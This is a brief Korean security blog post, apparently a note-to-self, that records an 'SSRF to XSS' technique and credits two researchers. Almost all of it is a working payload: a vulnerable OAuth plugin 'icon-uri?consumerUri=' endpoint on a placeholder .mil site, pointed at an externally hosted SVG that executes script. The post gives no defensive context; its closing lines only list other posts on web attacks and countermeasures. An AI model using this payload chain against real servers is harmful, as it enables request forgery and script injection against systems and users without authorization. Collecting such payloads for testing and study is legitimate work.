https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery
SSRF to XSS
by @D0rkerDevil & @alyssa.o.herrera
http://brutelogic.com.br/poc.svg -> simple alert
https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri= -> simple ssrf
https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg
'웹' 카테고리의 다른 글
HTTP Request Smuggling (0) | 2022.04.09 |
---|---|
서버버전 정보 노출 대응방안 (0) | 2022.02.25 |
LDAP 인젝션 (0) | 2022.01.20 |
ckeditor release-notes (0) | 2021.12.27 |
websquare 이하 경로 (0) | 2021.12.21 |